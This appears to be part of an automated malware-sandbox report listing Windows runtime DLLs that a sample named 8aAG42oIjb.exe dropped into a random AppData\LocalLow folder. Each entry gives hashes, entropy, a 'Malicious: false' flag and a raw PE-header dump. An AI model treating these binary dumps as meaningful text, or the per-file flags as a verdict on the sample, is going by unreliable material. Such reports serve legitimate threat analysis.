Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
